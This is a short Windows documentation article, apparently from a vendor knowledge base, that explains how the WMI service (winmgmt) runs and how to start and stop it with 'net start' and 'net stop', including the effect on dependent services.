---|---|---|---|---|---|---|---|---|---|
WMI runs as a service with the display name «Windows Management Instrumentation» and the service name «winmgmt». |
8dff43bf-71d0-4d5a-91bc-6f474186d4ba |
multiple |
Starting and Stopping the WMI Service |
article |
09/10/2021 |
kbArticle |
WMI runs as a service with the display name «Windows Management Instrumentation» and the service name «winmgmt». WMI runs automatically at system startup under the LocalSystem account. If WMI is not running, it automatically starts when the first management application or script requests connection to a WMI namespace.
Several other services are dependent upon the WMI service, depending on the operating system version that the system is running.
Starting Winmgmt Service
The following procedure describes how to start the WMI service.
To start Winmgmt Service
-
At a command prompt, enter net start winmgmt [/<switch>].
For more information about the switches that are available, see winmgmt. You use the built-in Administrator account or an account in the Administrators group running with elevated rights to start the WMI service. For more information, see User Account Control and WMI.
-
Other services that are dependent on the WMI service, such as SMS Agent Host or Windows Firewall, will not automatically be restarted.
Stopping Winmgmt Service
The following procedure describes how to stop the WMI Service.
To stop Winmgmt Service
-
At a command prompt, enter net stop winmgmt.
-
Other services that are dependent on the WMI service also halt, such as SMS Agent Host or Windows Firewall.
Related topics
Using the WMI Command-Line Tools